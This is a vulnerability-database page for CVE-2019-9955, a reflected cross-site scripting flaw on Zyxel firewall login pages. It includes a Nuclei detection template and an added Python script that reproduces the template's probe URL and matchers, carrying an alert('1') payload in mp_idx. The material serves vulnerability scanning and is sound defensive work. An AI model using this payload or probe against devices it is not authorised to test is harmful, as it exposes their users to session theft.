| Title | Published | Views | Family |
|---|---|---|---|
| Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting | 16 Apr 2019 00:00 | – | zdt |
| Cross-Site Scripting Vulnerabilities in Multiple ZyXEL Products | 17 Apr 2019 00:00 | – | cnvd |
| CVE-2019-9955 | 22 Apr 2019 19:38 | – | cve |
| CVE-2019-9955 | 22 Apr 2019 19:38 | – | cvelist |
| CVE-2019-9955 | 22 Apr 2019 20:29 | – | nvd |
| Zyxel ZyWall Cross Site Scripting | 16 Apr 2019 00:00 | – | packetstorm |
| Cross site scripting | 22 Apr 2019 20:29 | – | prion |
```yaml
id: CVE-2019-9955

info:
  name: Zyxel - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
  impact: |
    Attackers can execute scripts in the victim's browser, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
  remediation: |
    Apply the latest firmware updates provided by Zyxel to fix the reflected cross-site scripting vulnerability.
  reference:
    - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
    - https://www.exploit-db.com/exploits/46706/
    - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
    - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9955
    cwe-id: CWE-79
    epss-score: 0.10697
    epss-percentile: 0.93454
    cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: atp200_firmware
  tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"

    matchers:
      - type: word
        part: body
        words:
          - "\";alert('1');//"
          - "<title>Welcome</title>"
        condition: and
# digest: 490a004630440220192223fcac5c5eb4f94a80e8169bdf2304319da40d4b1d03accf668f210f9c23022077cbe6e85917fa1f6f4ea7dc177670ace5d5bccdb567877aad189467a4ca0602:922c64590222798bb761d5b6d8e72950
```
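The template above sends a single GET with the payload in `mp_idx` and declares a hit only when the body contains both the unencoded payload and the login page's `<title>Welcome</title>`. The following is an added example, not part of the Nuclei template or of any Zyxel code: a stand-alone Python script that builds the same probe URL (percent-encoding only the quote characters, as the template does), applies the same two word matchers with `condition: and`, and exercises them against constructed responses. The JavaScript-string echo context used for those responses, the example host, and the response bodies are assumptions made for illustration, not captured device output. It also shows one caveat a tester should know: Nuclei word matchers are plain substring checks, so a response that backslash-escapes the reflected quote inside a JS string still contains `";alert('1');//` and would still match; the `reflected_unescaped` heuristic added here rejects that case, so confirm a hit by looking at the actual reflection context before reporting.

```python
"""Stand-alone re-implementation of the CVE-2019-9955 Nuclei template's probe and matchers.

Added example, not the template's or the vendor's code. The login-page HTML below is
constructed: it assumes mp_idx is echoed into a JavaScript string, which is an
illustration of a reflection context, not a statement about the real firmware.
"""
import html
import json
import re
import urllib.request
from urllib.parse import quote

# Raw payload the template sends in mp_idx (before URL-encoding).
PAYLOAD = "\";alert('1');//"
# The template's two word matchers, evaluated with condition: and.
MATCH_WORDS = (PAYLOAD, "<title>Welcome</title>")


def build_probe_url(base_url: str) -> str:
    """Reproduce {{BaseURL}}/?mp_idx=%22;alert(%271%27);// exactly.

    The template leaves ; ( ) / unencoded and percent-encodes only " and ',
    so the same characters are kept in the safe set here.
    """
    return f"{base_url.rstrip('/')}/?mp_idx={quote(PAYLOAD, safe=';()/')}"


def template_matches(body: str) -> bool:
    """Substring ('word') matchers joined with AND, as Nuclei evaluates them."""
    return all(word in body for word in MATCH_WORDS)


# Stricter heuristic (not in the template): the reflected quote must not be
# preceded by a backslash, otherwise a JS-string-escaped echo still matches.
_UNESCAPED = re.compile(r"(?<!\\)\";alert\('1'\);//")


def reflected_unescaped(body: str) -> bool:
    """True only if the payload is echoed with an unescaped leading quote."""
    return "<title>Welcome</title>" in body and _UNESCAPED.search(body) is not None


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Send the one GET the template sends (max-request: 1) and evaluate both checks.

    Network call; not exercised by the offline checks below.
    """
    url = build_probe_url(base_url)
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2019-9955-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return {
        "url": url,
        "template_match": template_matches(body),
        "unescaped_reflection": reflected_unescaped(body),
    }


def _login_page(echoed_value: str) -> str:
    """Constructed login page: mp_idx echoed into a JS string (assumed context)."""
    return (
        "<html><head><title>Welcome</title></head><body>"
        f'<script>var mp_idx = "{echoed_value}";</script>'
        "</body></html>"
    )


# Three constructed reflection behaviours (not real device output).
BODY_RAW_REFLECTION = _login_page(PAYLOAD)                         # verbatim echo: vulnerable
BODY_HTML_ESCAPED = _login_page(html.escape(PAYLOAD, quote=True))  # entity-encoded: no match
BODY_JS_ESCAPED = _login_page(json.dumps(PAYLOAD)[1:-1])           # backslash-escaped quote


if __name__ == "__main__":
    for name, body in (("raw", BODY_RAW_REFLECTION),
                       ("html-escaped", BODY_HTML_ESCAPED),
                       ("js-escaped", BODY_JS_ESCAPED)):
        print(f"{name:13s} template_match={template_matches(body)!s:5s} "
              f"unescaped={reflected_unescaped(body)}")
    print("probe URL for 192.0.2.1:", build_probe_url("http://192.0.2.1"))
```

Running the script offline prints that the raw echo trips both checks, the entity-encoded echo trips neither, and the backslash-escaped echo trips the template's substring matcher but not the stricter check. To run it against a host you are authorised to test, call `probe("http://<device>")`; it issues exactly one request, matching the template's `max-request: 1`.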